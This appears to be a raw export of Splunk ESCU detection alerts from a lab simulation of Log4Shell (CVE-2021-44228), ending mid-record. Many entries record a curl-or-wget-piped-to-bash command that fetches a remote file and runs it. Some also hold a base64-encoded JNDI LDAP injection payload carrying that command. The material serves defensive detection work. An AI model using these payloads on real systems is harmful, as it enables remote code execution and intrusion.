user="ubuntu" 1642645116, search_name="ESCU - Wget Download and Bash Execution - Rule", analyticstories="Ingress Tool Transfer", analyticstories="Log4Shell CVE-2021-44228", annotations="{\"analytic_story\":[\"Ingress Tool Transfer\",\"Log4Shell CVE-2021-44228\"],\"context\":[\"Source:Endpoint\",\"Stage:Defense Evasion\"],\"cve\":[\"CVE-2021-44228\"],\"kill_chain_phases\":[\"Exploitation\"],\"mitre_attack\":[\"T1105\"],\"observable\":[]}", annotations._all="Ingress Tool Transfer", annotations._all="Source:Endpoint", annotations._all="T1105", annotations._all="CVE-2021-44228", annotations._all="Log4Shell CVE-2021-44228", annotations._all="Exploitation", annotations._all="Stage:Defense Evasion", annotations._frameworks="analytic_story", annotations._frameworks="context", annotations._frameworks="cve", annotations._frameworks="kill_chain_phases", annotations._frameworks="mitre_attack", annotations.analytic_story="Ingress Tool Transfer", annotations.analytic_story="Log4Shell CVE-2021-44228", annotations.context="Source:Endpoint", annotations.context="Stage:Defense Evasion", annotations.cve="CVE-2021-44228", annotations.kill_chain_phases="Exploitation", annotations.mitre_attack="T1105", count="1", dest="sysmonlinux-jhernandez-16155-1604", firstTime="1642633814", info_max_time="+Infinity", info_min_time="0.000", lastTime="2022-01-19T23:10:14", parent_process_id="7756", parent_process_name="-", process="/bin/sh -c (curl http://8.8.8.8:80/wp-content/themes/twentythirteen/m8 || wget -qO - http://8.8.8.8:80/wp-content/themes/twentythirteen/m8)|bash", process_id="7877", process_name="dash", risk_message="An instance of dash was identified on endpoint sysmonlinux-jhernandez-16155-1604 attempting to download a remote file and run it with bash.", risk_object="sysmonlinux-jhernandez-16155-1604", risk_object_type="system", risk_score="80.0", savedsearch_description="The following analytic identifies the use of wget on Linux or MacOS attempting to download a file from a remote source and pipe it to bash. This is typically found with coinminers and most recently with CVE-2021-44228, a vulnerability in Log4j.", threat_object="dash", threat_object_type="process", user="ubuntu" 1642645116, search_name="ESCU - Wget Download and Bash Execution - Rule", analyticstories="Ingress Tool Transfer", analyticstories="Log4Shell CVE-2021-44228", annotations="{\"analytic_story\":[\"Ingress Tool Transfer\",\"Log4Shell CVE-2021-44228\"],\"context\":[\"Source:Endpoint\",\"Stage:Defense Evasion\"],\"cve\":[\"CVE-2021-44228\"],\"kill_chain_phases\":[\"Exploitation\"],\"mitre_attack\":[\"T1105\"],\"observable\":[]}", annotations._all="Ingress Tool Transfer", annotations._all="Source:Endpoint", annotations._all="T1105", annotations._all="CVE-2021-44228", annotations._all="Log4Shell CVE-2021-44228", annotations._all="Exploitation", annotations._all="Stage:Defense Evasion", annotations._frameworks="analytic_story", annotations._frameworks="context", annotations._frameworks="cve", annotations._frameworks="kill_chain_phases", annotations._frameworks="mitre_attack", annotations.analytic_story="Ingress Tool Transfer", annotations.analytic_story="Log4Shell CVE-2021-44228", annotations.context="Source:Endpoint", annotations.context="Stage:Defense Evasion", annotations.cve="CVE-2021-44228", annotations.kill_chain_phases="Exploitation", annotations.mitre_attack="T1105", count="1", dest="sysmonlinux-jhernandez-16155-1604", firstTime="1642633814", info_max_time="+Infinity", info_min_time="0.000", lastTime="2022-01-19T23:10:14", parent_process_id="7756", parent_process_name="-", process="/bin/sh -c (curl http://8.8.8.8:80/wp-content/themes/twentythirteen/m8 || wget -qO - http://8.8.8.8:80/wp-content/themes/twentythirteen/m8)|bash", process_id="7877", process_name="dash", risk_message="An instance of dash was identified on endpoint sysmonlinux-jhernandez-16155-1604 attempting to download a remote file and run it with bash.", risk_object="ubuntu", risk_object_type="user", risk_score="80.0", savedsearch_description="The following analytic identifies the use of wget on Linux or MacOS attempting to download a file from a remote source and pipe it to bash. This is typically found with coinminers and most recently with CVE-2021-44228, a vulnerability in Log4j.", threat_object="dash", threat_object_type="process", user="ubuntu" 1642645116, search_name="ESCU - Wget Download and Bash Execution - Rule", analyticstories="Ingress Tool Transfer", analyticstories="Log4Shell CVE-2021-44228", annotations="{\"analytic_story\":[\"Ingress Tool Transfer\",\"Log4Shell CVE-2021-44228\"],\"context\":[\"Source:Endpoint\",\"Stage:Defense Evasion\"],\"cve\":[\"CVE-2021-44228\"],\"kill_chain_phases\":[\"Exploitation\"],\"mitre_attack\":[\"T1105\"],\"observable\":[]}", annotations._all="Ingress Tool Transfer", annotations._all="Source:Endpoint", annotations._all="T1105", annotations._all="CVE-2021-44228", annotations._all="Log4Shell CVE-2021-44228", annotations._all="Exploitation", annotations._all="Stage:Defense Evasion", annotations._frameworks="analytic_story", annotations._frameworks="context", annotations._frameworks="cve", annotations._frameworks="kill_chain_phases", annotations._frameworks="mitre_attack", annotations.analytic_story="Ingress Tool Transfer", annotations.analytic_story="Log4Shell CVE-2021-44228", annotations.context="Source:Endpoint", annotations.context="Stage:Defense Evasion", annotations.cve="CVE-2021-44228", annotations.kill_chain_phases="Exploitation", annotations.mitre_attack="T1105", count="1", dest="sysmonlinux-jhernandez-16155-1604", firstTime="1642633812", info_max_time="+Infinity", info_min_time="0.000", lastTime="2022-01-19T23:10:12", parent_process_id="7756", parent_process_name="-", process="/bin/sh -c (curl http://8.8.8.8:80/wp-content/themes/twentythirteen/m8 || wget -qO - http://8.8.8.8:80/wp-content/themes/twentythirteen/m8)|bash", process_id="7870", process_name="dash", risk_message="An instance of dash was identified on endpoint sysmonlinux-jhernandez-16155-1604 attempting to download a remote file and run it with bash.", risk_object="sysmonlinux-jhernandez-16155-1604", risk_object_type="system", risk_score="80.0", savedsearch_description="The following analytic identifies the use of wget on Linux or MacOS attempting to download a file from a remote source and pipe it to bash. This is typically found with coinminers and most recently with CVE-2021-44228, a vulnerability in Log4j.", threat_object="dash", threat_object_type="process", user="ubuntu" 1642645116, search_name="ESCU - Wget Download and Bash Execution - Rule", analyticstories="Ingress Tool Transfer", analyticstories="Log4Shell CVE-2021-44228", annotations="{\"analytic_story\":[\"Ingress Tool Transfer\",\"Log4Shell CVE-2021-44228\"],\"context\":[\"Source:Endpoint\",\"Stage:Defense Evasion\"],\"cve\":[\"CVE-2021-44228\"],\"kill_chain_phases\":[\"Exploitation\"],\"mitre_attack\":[\"T1105\"],\"observable\":[]}", annotations._all="Ingress Tool Transfer", annotations._all="Source:Endpoint", annotations._all="T1105", annotations._all="CVE-2021-44228", annotations._all="Log4Shell CVE-2021-44228", annotations._all="Exploitation", annotations._all="Stage:Defense Evasion", annotations._frameworks="analytic_story", annotations._frameworks="context", annotations._frameworks="cve", annotations._frameworks="kill_chain_phases", annotations._frameworks="mitre_attack", annotations.analytic_story="Ingress Tool Transfer", annotations.analytic_story="Log4Shell CVE-2021-44228", annotations.context="Source:Endpoint", annotations.context="Stage:Defense Evasion", annotations.cve="CVE-2021-44228", annotations.kill_chain_phases="Exploitation", annotations.mitre_attack="T1105", count="1", dest="sysmonlinux-jhernandez-16155-1604", firstTime="1642633812", info_max_time="+Infinity", info_min_time="0.000", lastTime="2022-01-19T23:10:12", parent_process_id="7756", parent_process_name="-", process="/bin/sh -c (curl http://8.8.8.8:80/wp-content/themes/twentythirteen/m8 || wget -qO - http://8.8.8.8:80/wp-content/themes/twentythirteen/m8)|bash", process_id="7870", process_name="dash", risk_message="An instance of dash was identified on endpoint sysmonlinux-jhernandez-16155-1604 attempting to download a remote file and run it with bash.", risk_object="ubuntu", risk_object_type="user", risk_score="80.0", savedsearch_description="The following analytic identifies the use of wget on Linux or MacOS attempting to download a file from a remote source and pipe it to bash. This is typically found with coinminers and most recently with CVE-2021-44228, a vulnerability in Log4j.", threat_object="dash", threat_object_type="process", user="ubuntu" 1642645116, search_name="ESCU - Wget Download and Bash Execution - Rule", analyticstories="Ingress Tool Transfer", analyticstories="Log4Shell CVE-2021-44228", annotations="{\"analytic_story\":[\"Ingress Tool Transfer\",\"Log4Shell CVE-2021-44228\"],\"context\":[\"Source:Endpoint\",\"Stage:Defense Evasion\"],\"cve\":[\"CVE-2021-44228\"],\"kill_chain_phases\":[\"Exploitation\"],\"mitre_attack\":[\"T1105\"],\"observable\":[]}", annotations._all="Ingress Tool Transfer", annotations._all="Source:Endpoint", annotations._all="T1105", annotations._all="CVE-2021-44228", annotations._all="Log4Shell CVE-2021-44228", annotations._all="Exploitation", annotations._all="Stage:Defense Evasion", annotations._frameworks="analytic_story", annotations._frameworks="context", annotations._frameworks="cve", annotations._frameworks="kill_chain_phases", annotations._frameworks="mitre_attack", annotations.analytic_story="Ingress Tool Transfer", annotations.analytic_story="Log4Shell CVE-2021-44228", annotations.context="Source:Endpoint", annotations.context="Stage:Defense Evasion", annotations.cve="CVE-2021-44228", annotations.kill_chain_phases="Exploitation", annotations.mitre_attack="T1105", count="1", dest="sysmonlinux-jhernandez-16155-1604", firstTime="1642631700", info_max_time="+Infinity", info_min_time="0.000", lastTime="2022-01-19T22:35:00", parent_process_id="7756", parent_process_name="-", process="/bin/sh -c (curl http://8.8.8.8:80/wp-content/themes/twentythirteen/m8 || wget -qO - http://8.8.8.8:80/wp-content/themes/twentythirteen/m8)|bash", process_id="7798", process_name="dash", risk_message="An instance of dash was identified on endpoint sysmonlinux-jhernandez-16155-1604 attempting to download a remote file and run it with bash.", risk_object="sysmonlinux-jhernandez-16155-1604", risk_object_type="system", risk_score="80.0", savedsearch_description="The following analytic identifies the use of wget on Linux or MacOS attempting to download a file from a remote source and pipe it to bash. This is typically found with coinminers and most recently with CVE-2021-44228, a vulnerability in Log4j.", threat_object="dash", threat_object_type="process", user="ubuntu" 1642645116, search_name="ESCU - Wget Download and Bash Execution - Rule", analyticstories="Ingress Tool Transfer", analyticstories="Log4Shell CVE-2021-44228", annotations="{\"analytic_story\":[\"Ingress Tool Transfer\",\"Log4Shell CVE-2021-44228\"],\"context\":[\"Source:Endpoint\",\"Stage:Defense Evasion\"],\"cve\":[\"CVE-2021-44228\"],\"kill_chain_phases\":[\"Exploitation\"],\"mitre_attack\":[\"T1105\"],\"observable\":[]}", annotations._all="Ingress Tool Transfer", annotations._all="Source:Endpoint", annotations._all="T1105", annotations._all="CVE-2021-44228", annotations._all="Log4Shell CVE-2021-44228", annotations._all="Exploitation", annotations._all="Stage:Defense Evasion", annotations._frameworks="analytic_story", annotations._frameworks="context", annotations._frameworks="cve", annotations._frameworks="kill_chain_phases", annotations._frameworks="mitre_attack", annotations.analytic_story="Ingress Tool Transfer", annotations.analytic_story="Log4Shell CVE-2021-44228", annotations.context="Source:Endpoint", annotations.context="Stage:Defense Evasion", annotations.cve="CVE-2021-44228", annotations.kill_chain_phases="Exploitation", annotations.mitre_attack="T1105", count="1", dest="sysmonlinux-jhernandez-16155-1604", firstTime="1642631700", info_max_time="+Infinity", info_min_time="0.000", lastTime="2022-01-19T22:35:00", parent_process_id="7756", parent_process_name="-", process="/bin/sh -c (curl http://8.8.8.8:80/wp-content/themes/twentythirteen/m8 || wget -qO - http://8.8.8.8:80/wp-content/themes/twentythirteen/m8)|bash", process_id="7798", process_name="dash", risk_message="An instance of dash was identified on endpoint sysmonlinux-jhernandez-16155-1604 attempting to download a remote file and run it with bash.", risk_object="ubuntu", risk_object_type="user", risk_score="80.0", savedsearch_description="The following analytic identifies the use of wget on Linux or MacOS attempting to download a file from a remote source and pipe it to bash. This is typically found with coinminers and most recently with CVE-2021-44228, a vulnerability in Log4j.", threat_object="dash", threat_object_type="process", user="ubuntu" 1642644854, search_name="ESCU - Detect Outbound LDAP Traffic - Rule", analyticstories="Log4Shell CVE-2021-44228", annotations="{\"analytic_story\":[\"Log4Shell CVE-2021-44228\"],\"cis20\":[\"CIS 12\",\"CIS 13\"],\"context\":[\"Source:Endpoint\",\"Stage:Initial Access\"],\"cve\":[\"CVE-2021-44228\"],\"kill_chain_phases\":[\"Command and Control\",\"Actions on Objectives\"],\"mitre_attack\":[\"T1190\",\"T1059\"],\"nist\":[\"PR.DS\",\"PR.PT\",\"DE.AE\",\"DE.CM\"],\"observable\":[]}", annotations._all="T1059", annotations._all="Actions on Objectives", annotations._all="CIS 13", annotations._all="PR.DS", annotations._all="T1190", annotations._all="DE.CM", annotations._all="CIS 12", annotations._all="DE.AE", annotations._all="Command and Control", annotations._all="PR.PT", annotations._all="Log4Shell CVE-2021-44228", annotations._all="Source:Endpoint", annotations._all="CVE-2021-44228", annotations._all="Stage:Initial Access", annotations._frameworks="analytic_story", annotations._frameworks="cis20", annotations._frameworks="context", annotations._frameworks="cve", annotations._frameworks="kill_chain_phases", annotations._frameworks="mitre_attack", annotations._frameworks="nist", annotations.analytic_story="Log4Shell CVE-2021-44228", annotations.cis20="CIS 12", annotations.cis20="CIS 13", annotations.context="Source:Endpoint", annotations.context="Stage:Initial Access", annotations.cve="CVE-2021-44228", annotations.kill_chain_phases="Command and Control", annotations.kill_chain_phases="Actions on Objectives", annotations.mitre_attack="T1190", annotations.mitre_attack="T1059", annotations.nist="PR.DS", annotations.nist="PR.PT", annotations.nist="DE.AE", annotations.nist="DE.CM", dest_ip="0:0:0:0:0:ffff:a00:110", earliest_time="2022-01-19T22:34:59", info_max_time="+Infinity", info_min_time="0.000", latest_time="2022-01-20T00:21:41", risk_message="An outbound LDAP connection from 0:0:0:0:0:ffff:a00:114 in your infrastructure connecting to dest ip 0:0:0:0:0:ffff:a00:110", risk_object="0:0:0:0:0:ffff:a00:110", risk_object_type="system", risk_score="56.0", savedsearch_description="Malicious actors often abuse misconfigured LDAP servers or applications that use the LDAP servers in organizations. Outbound LDAP traffic should not be allowed outbound through your perimeter firewall. This search will help determine if you have any LDAP connections to IP addresses outside of private (RFC1918) address space.", src_ip="0:0:0:0:0:ffff:a00:114" 1642644852, search_name="ESCU - Log4Shell JNDI Payload Injection Attempt - Rule", action="Bad Request", analyticstories="Log4Shell CVE-2021-44228", annotations="{\"analytic_story\":[\"Log4Shell CVE-2021-44228\"],\"cis20\":[\"CIS 3\",\"CIS 5\",\"CIS 16\"],\"context\":[\"Source:Application Log\",\"Stage:Execution\"],\"cve\":[\"CVE-2021-44228\"],\"kill_chain_phases\":[\"Reconnaissance\",\"Exploitation\"],\"mitre_attack\":[\"T1190\"],\"nist\":[\"DE.CM\"],\"observable\":[]}", annotations._all="Exploitation", annotations._all="CVE-2021-44228", annotations._all="CIS 3", annotations._all="Reconnaissance", annotations._all="Source:Application Log", annotations._all="Log4Shell CVE-2021-44228", annotations._all="DE.CM", annotations._all="T1190", annotations._all="Stage:Execution", annotations._all="CIS 16", annotations._all="CIS 5", annotations._frameworks="analytic_story", annotations._frameworks="cis20", annotations._frameworks="context", annotations._frameworks="cve", annotations._frameworks="kill_chain_phases", annotations._frameworks="mitre_attack", annotations._frameworks="nist", annotations.analytic_story="Log4Shell CVE-2021-44228", annotations.cis20="CIS 3", annotations.cis20="CIS 5", annotations.cis20="CIS 16", annotations.context="Source:Application Log", annotations.context="Stage:Execution", annotations.cve="CVE-2021-44228", annotations.kill_chain_phases="Reconnaissance", annotations.kill_chain_phases="Exploitation", annotations.mitre_attack="T1190", annotations.nist="DE.CM", category="application/json", count="2", dest="10.0.1.21", dest_port="80", http_content_type="application/json", http_method="GET", http_referrer="unknown", http_user_agent="curl/7.79.1", info_max_time="+Infinity", info_min_time="0.000", risk_message="CVE-2021-44228 Log4Shell triggered for host 10.0.1.21", risk_object="10.0.1.21", risk_object_type="system", risk_score="15.0", savedsearch_description="CVE-2021-44228 Log4Shell payloads can be injected via various methods, but on of the most common vectors injection is via Web calls. Many of the vulnerable java web applications that are using log4j have a web component to them are specially targets of this injection, specifically projects like Apache Struts, Flink, Druid, and Solr. The exploit is triggered by a LDAP lookup function in the log4j package, its invocation is similar to `${jndi:ldap://PAYLOAD_INJECTED}`, when executed against vulnerable web applications the invocation can be seen in various part of web logs. Specifically it has been successfully exploited via headers like X-Forwarded-For, User-Agent, Referer, and X-Api-Version. In this detection we first limit the scope of our search to the Web Datamodel and use the `| from datamodel` function to benefit from schema accelerated searching capabilities, mainly because the second part of the detection is pretty heavy, it runs a regex across all _raw events that looks for `${jndi:ldap://` pattern across all potential web fields available to the raw data, like http headers for example. If you see results for this detection, it means that there was a attempt at a injection, which could be a reconnaissance activity or a valid expliotation attempt, but this does not exactly mean that the host was indeed successfully exploited.", site="localhost", src="${jndi:ldap://10.0.1.16:1389/Basic/Command/Base64/KGN1cmwgaHR0cDovLzguOC44Ljg6ODAvd3AtY29udGVudC90aGVtZXMvdHdlbnR5dGhpcnRlZW4vbTggfHwgd2dldCAtcU8gLSBodHRwOi8vOC44LjguODo4MC93cC1jb250ZW50L3RoZW1lcy90d2VudHl0aGlydGVlbi9tOCl8YmFzaA==}", url="http://10.0.1.21:80/", url_domain="10.0.1.21", user="unknown" 1642644854, search_name="ESCU - Detect Outbound LDAP Traffic - Rule", analyticstories="Log4Shell CVE-2021-44228", annotations="{\"analytic_story\":[\"Log4Shell CVE-2021-44228\"],\"cis20\":[\"CIS 12\",\"CIS 13\"],\"context\":[\"Source:Endpoint\",\"Stage:Initial Access\"],\"cve\":[\"CVE-2021-44228\"],\"kill_chain_phases\":[\"Command and Control\",\"Actions on Objectives\"],\"mitre_attack\":[\"T1190\",\"T1059\"],\"nist\":[\"PR.DS\",\"PR.PT\",\"DE.AE\",\"DE.CM\"],\"observable\":[]}", annotations._all="T1059", annotations._all="Actions on Objectives", annotations._all="CIS 13", annotations._all="PR.DS", annotations._all="T1190", annotations._all="DE.CM", annotations._all="CIS 12", annotations._all="DE.AE", annotations._all="Command and Control", annotations._all="PR.PT", annotations._all="Log4Shell CVE-2021-44228", annotations._all="Source:Endpoint", annotations._all="CVE-2021-44228", annotations._all="Stage:Initial Access", annotations._frameworks="analytic_story", annotations._frameworks="cis20", annotations._frameworks="context", annotations._frameworks="cve", annotations._frameworks="kill_chain_phases", annotations._frameworks="mitre_attack", annotations._frameworks="nist", annotations.analytic_story="Log4Shell CVE-2021-44228", annotations.cis20="CIS 12", annotations.cis20="CIS 13", annotations.context="Source:Endpoint", annotations.context="Stage:Initial Access", annotations.cve="CVE-2021-44228", annotations.kill_chain_phases="Command and Control", annotations.kill_chain_phases="Actions on Objectives", annotations.mitre_attack="T1190", annotations.mitre_attack="T1059", annotations.nist="PR.DS", annotations.nist="PR.PT", annotations.nist="DE.AE", annotations.nist="DE.CM", dest_ip="0:0:0:0:0:ffff:a00:110", earliest_time="2022-01-19T22:34:59", info_max_time="+Infinity", info_min_time="0.000", latest_time="2022-01-20T00:21:41", risk_message="An outbound LDAP connection from 0:0:0:0:0:ffff:a00:114 in your infrastructure connecting to dest ip 0:0:0:0:0:ffff:a00:110", risk_object="0:0:0:0:0:ffff:a00:114", risk_object_type="system", risk_score="56.0", savedsearch_description="Malicious actors often abuse misconfigured LDAP servers or applications that use the LDAP servers in organizations. Outbound LDAP traffic should not be allowed outbound through your perimeter firewall. This search will help determine if you have any LDAP connections to IP addresses outside of private (RFC1918) address space.", src_ip="0:0:0:0:0:ffff:a00:114" 1642644852, search_name="ESCU - Log4Shell JNDI Payload Injection Attempt - Rule", action="Bad Request", analyticstories="Log4Shell CVE-2021-44228", annotations="{\"analytic_story\":[\"Log4Shell CVE-2021-44228\"],\"cis20\":[\"CIS 3\",\"CIS 5\",\"CIS 16\"],\"context\":[\"Source:Application Log\",\"Stage:Execution\"],\"cve\":[\"CVE-2021-44228\"],\"kill_chain_phases\":[\"Reconnaissance\",\"Exploitation\"],\"mitre_attack\":[\"T1190\"],\"nist\":[\"DE.CM\"],\"observable\":[]}", annotations._all="Exploitation", annotations._all="CVE-2021-44228", annotations._all="CIS 3", annotations._all="Reconnaissance", annotations._all="Source:Application Log", annotations._all="Log4Shell CVE-2021-44228", annotations._all="DE.CM", annotations._all="T1190", annotations._all="Stage:Execution", annotations._all="CIS 16", annotations._all="CIS 5", annotations._frameworks="analytic_story", annotations._frameworks="cis20", annotations._frameworks="context", annotations._frameworks="cve", annotations._frameworks="kill_chain_phases", annotations._frameworks="mitre_attack", annotations._frameworks="nist", annotations.analytic_story="Log4Shell CVE-2021-44228", annotations.cis20="CIS 3", annotations.cis20="CIS 5", annotations.cis20="CIS 16", annotations.context="Source:Application Log", annotations.context="Stage:Execution", annotations.cve="CVE-2021-44228", annotations.kill_chain_phases="Reconnaissance", annotations.kill_chain_phases="Exploitation", annotations.mitre_attack="T1190", annotations.nist="DE.CM", category="application/json", count="2", dest="10.0.1.21", dest_port="80", http_content_type="application/json", http_method="GET", http_referrer="unknown", http_user_agent="curl/7.79.1", info_max_time="+Infinity", info_min_time="0.000", risk_message="CVE-2021-44228 Log4Shell triggered for host 10.0.1.21", risk_object="unknown", risk_object_type="user", risk_score="15.0", savedsearch_description="CVE-2021-44228 Log4Shell payloads can be injected via various methods, but on of the most common vectors injection is via Web calls. Many of the vulnerable java web applications that are using log4j have a web component to them are specially targets of this injection, specifically projects like Apache Struts, Flink, Druid, and Solr. The exploit is triggered by a LDAP lookup function in the log4j package, its invocation is similar to `${jndi:ldap://PAYLOAD_INJECTED}`, when executed against vulnerable web applications the invocation can be seen in various part of web logs. Specifically it has been successfully exploited via headers like X-Forwarded-For, User-Agent, Referer, and X-Api-Version. In this detection we first limit the scope of our search to the Web Datamodel and use the `| from datamodel` function to benefit from schema accelerated searching capabilities, mainly because the second part of the detection is pretty heavy, it runs a regex across all _raw events that looks for `${jndi:ldap://` pattern across all potential web fields available to the raw data, like http headers for example. If you see results for this detection, it means that there was a attempt at a injection, which could be a reconnaissance activity or a valid expliotation attempt, but this does not exactly mean that the host was indeed successfully exploited.", site="localhost", src="${jndi:ldap://10.0.1.16:1389/Basic/Command/Base64/KGN1cmwgaHR0cDovLzguOC44Ljg6ODAvd3AtY29udGVudC90aGVtZXMvdHdlbnR5dGhpcnRlZW4vbTggfHwgd2dldCAtcU8gLSBodHRwOi8vOC44LjguODo4MC93cC1jb250ZW50L3RoZW1lcy90d2VudHl0aGlydGVlbi9tOCl8YmFzaA==}", url="http://10.0.1.21:80/", url_domain="10.0.1.21", user="unknown" 1642644816, search_name="ESCU - Wget Download and Bash Execution - Rule", analyticstories="Ingress Tool Transfer", analyticstories="Log4Shell CVE-2021-44228", annotations="{\"analytic_story\":[\"Ingress Tool Transfer\",\"Log4Shell CVE-2021-44228\"],\"context\":[\"Source:Endpoint\",\"Stage:Defense Evasion\"],\"cve\":[\"CVE-2021-44228\"],\"kill_chain_phases\":[\"Exploitation\"],\"mitre_attack\":[\"T1105\"],\"observable\":[]}", annotations._all="Stage:Defense Evasion", annotations._all="T1105", annotations._all="Exploitation", annotations._all="Ingress Tool Transfer", annotations._all="Log4Shell CVE-2021-44228", annotations._all="CVE-2021-44228", annotations._all="Source:Endpoint", annotations._frameworks="analytic_story", annotations._frameworks="context", annotations._frameworks="cve", annotations._frameworks="kill_chain_phases", annotations._frameworks="mitre_attack", annotations.analytic_story="Ingress Tool Transfer", annotations.analytic_story="Log4Shell CVE-2021-44228", annotations.context="Source:Endpoint", annotations.context="Stage:Defense Evasion", annotations.cve="CVE-2021-44228", annotations.kill_chain_phases="Exploitation", annotations.mitre_attack="T1105", count="1", dest="sysmonlinux-jhernandez-16155-1604", firstTime="1642638231", info_max_time="+Infinity", info_min_time="0.000", lastTime="2022-01-20T00:23:51", parent_process_id="8018", parent_process_name="dash", process="wget -qO - http://8.8.8.8:80/wp-content/themes/twentythirteen/m8", process_id="8020", process_name="wget", risk_message="An instance of wget was identified on endpoint sysmonlinux-jhernandez-16155-1604 attempting to download a remote file and run it with bash.", risk_object="sysmonlinux-jhernandez-16155-1604", risk_object_type="system", risk_score="80.0", savedsearch_description="The following analytic identifies the use of wget on Linux or MacOS attempting to download a file from a remote source and pipe it to bash. This is typically found with coinminers and most recently with CVE-2021-44228, a vulnerability in Log4j.", threat_object="wget", threat_object_type="process", user="ubuntu" 1642644816, search_name="ESCU - Wget Download and Bash Execution - Rule", analyticstories="Ingress Tool Transfer", analyticstories="Log4Shell CVE-2021-44228", annotations="{\"analytic_story\":[\"Ingress Tool Transfer\",\"Log4Shell CVE-2021-44228\"],\"context\":[\"Source:Endpoint\",\"Stage:Defense Evasion\"],\"cve\":[\"CVE-2021-44228\"],\"kill_chain_phases\":[\"Exploitation\"],\"mitre_attack\":[\"T1105\"],\"observable\":[]}", annotations._all="Stage:Defense Evasion", annotations._all="T1105", annotations._all="Exploitation", annotations._all="Ingress Tool Transfer", annotations._all="Log4Shell CVE-2021-44228", annotations._all="CVE-2021-44228", annotations._all="Source:Endpoint", annotations._frameworks="analytic_story", annotations._frameworks="context", annotations._frameworks="cve", annotations._frameworks="kill_chain_phases", annotations._frameworks="mitre_attack", annotations.analytic_story="Ingress Tool Transfer", annotations.analytic_story="Log4Shell CVE-2021-44228", annotations.context="Source:Endpoint", annotations.context="Stage:Defense Evasion", annotations.cve="CVE-2021-44228", annotations.kill_chain_phases="Exploitation", annotations.mitre_attack="T1105", count="1", dest="sysmonlinux-jhernandez-16155-1604", firstTime="1642638231", info_max_time="+Infinity", info_min_time="0.000", lastTime="2022-01-20T00:23:51", parent_process_id="8018", parent_process_name="dash", process="wget -qO - http://8.8.8.8:80/wp-content/themes/twentythirteen/m8", process_id="8020", process_name="wget", risk_message="An instance of wget was identified on endpoint sysmonlinux-jhernandez-16155-1604 attempting to download a remote file and run it with bash.", risk_object="ubuntu", risk_object_type="user", risk_score="80.0", savedsearch_description="The following analytic identifies the use of wget on Linux or MacOS attempting to download a file from a remote source and pipe it to bash. This is typically found with coinminers and most recently with CVE-2021-44228, a vulnerability in Log4j.", threat_object="wget", threat_object_type="process", user="ubuntu" 1642644816, search_name="ESCU - Wget Download and Bash Execution - Rule", analyticstories="Ingress Tool Transfer", analyticstories="Log4Shell CVE-2021-44228", annotations="{\"analytic_story\":[\"Ingress Tool Transfer\",\"Log4Shell CVE-2021-44228\"],\"context\":[\"Source:Endpoint\",\"Stage:Defense Evasion\"],\"cve\":[\"CVE-2021-44228\"],\"kill_chain_phases\":[\"Exploitation\"],\"mitre_attack\":[\"T1105\"],\"observable\":[]}", annotations._all="Stage:Defense Evasion", annotations._all="T1105", annotations._all="Exploitation", annotations._all="Ingress Tool Transfer", annotations._all="Log4Shell CVE-2021-44228", annotations._all="CVE-2021-44228", annotations._all="Source:Endpoint", annotations._frameworks="analytic_story", annotations._frameworks="context", annotations._frameworks="cve", annotations._frameworks="kill_chain_phases", annotations._frameworks="mitre_attack", annotations.analytic_story="Ingress Tool Transfer", annotations.analytic_story="Log4Shell CVE-2021-44228", annotations.context="Source:Endpoint", annotations.context="Stage:Defense Evasion", annotations.cve="CVE-2021-44228", annotations.kill_chain_phases="Exploitation", annotations.mitre_attack="T1105", count="1", dest="sysmonlinux-jhernandez-16155-1604", firstTime="1642633944", info_max_time="+Infinity", info_min_time="0.000", lastTime="2022-01-19T23:12:24", parent_process_id="7877", parent_process_name="dash", process="wget -qO - http://8.8.8.8:80/wp-content/themes/twentythirteen/m8", process_id="7879", process_name="wget", risk_message="An instance of wget was identified on endpoint sysmonlinux-jhernandez-16155-1604 attempting to download a remote file and run it with bash.", risk_object="sysmonlinux-jhernandez-16155-1604", risk_object_type="system", risk_score="80.0", savedsearch_description="The following analytic identifies the use of wget on Linux or MacOS attempting to download a file from a remote source and pipe it to bash. This is typically found with coinminers and most recently with CVE-2021-44228, a vulnerability in Log4j.", threat_object="wget", threat_object_type="process", user="ubuntu" 1642644816, search_name="ESCU - Wget Download and Bash Execution - Rule", analyticstories="Ingress Tool Transfer", analyticstories="Log4Shell CVE-2021-44228", annotations="{\"analytic_story\":[\"Ingress Tool Transfer\",\"Log4Shell CVE-2021-44228\"],\"context\":[\"Source:Endpoint\",\"Stage:Defense Evasion\"],\"cve\":[\"CVE-2021-44228\"],\"kill_chain_phases\":[\"Exploitation\"],\"mitre_attack\":[\"T1105\"],\"observable\":[]}", annotations._all="Stage:Defense Evasion", annotations._all="T1105", annotations._all="Exploitation", annotations._all="Ingress Tool Transfer", annotations._all="Log4Shell CVE-2021-44228", annotations._all="CVE-2021-44228", annotations._all="Source:Endpoint", annotations._frameworks="analytic_story", annotations._frameworks="context", annotations._frameworks="cve", annotations._frameworks="kill_chain_phases", annotations._frameworks="mitre_attack", annotations.analytic_story="Ingress Tool Transfer", annotations.analytic_story="Log4Shell CVE-2021-44228", annotations.context="Source:Endpoint", annotations.context="Stage:Defense Evasion", annotations.cve="CVE-2021-44228", annotations.kill_chain_phases="Exploitation", annotations.mitre_attack="T1105", count="1", dest="sysmonlinux-jhernandez-16155-1604", firstTime="1642633944", info_max_time="+Infinity", info_min_time="0.000", lastTime="2022-01-19T23:12:24", parent_process_id="7877", parent_process_name="dash", process="wget -qO - http://8.8.8.8:80/wp-content/themes/twentythirteen/m8", process_id="7879", process_name="wget", risk_message="An instance of wget was identified on endpoint sysmonlinux-jhernandez-16155-1604 attempting to download a remote file and run it with bash.", risk_object="ubuntu", risk_object_type="user", risk_score="80.0", savedsearch_description="The following analytic identifies the use of wget on Linux or MacOS attempting to download a file from a remote source and pipe it to bash. This is typically found with coinminers and most recently with CVE-2021-44228, a vulnerability in Log4j.", threat_object="wget", threat_object_type="process", user="ubuntu" 1642644816, search_name="ESCU - Wget Download and Bash Execution - Rule", analyticstories="Ingress Tool Transfer", analyticstories="Log4Shell CVE-2021-44228", annotations="{\"analytic_story\":[\"Ingress Tool Transfer\",\"Log4Shell CVE-2021-44228\"],\"context\":[\"Source:Endpoint\",\"Stage:Defense Evasion\"],\"cve\":[\"CVE-2021-44228\"],\"kill_chain_phases\":[\"Exploitation\"],\"mitre_attack\":[\"T1105\"],\"observable\":[]}", annotations._all="Stage:Defense Evasion", annotations._all="T1105", annotations._all="Exploitation", annotations._all="Ingress Tool Transfer", annotations._all="Log4Shell CVE-2021-44228", annotations._all="CVE-2021-44228", annotations._all="Source:Endpoint", annotations._frameworks="analytic_story", annotations._frameworks="context", annotations._frameworks="cve", annotations._frameworks="kill_chain_phases", 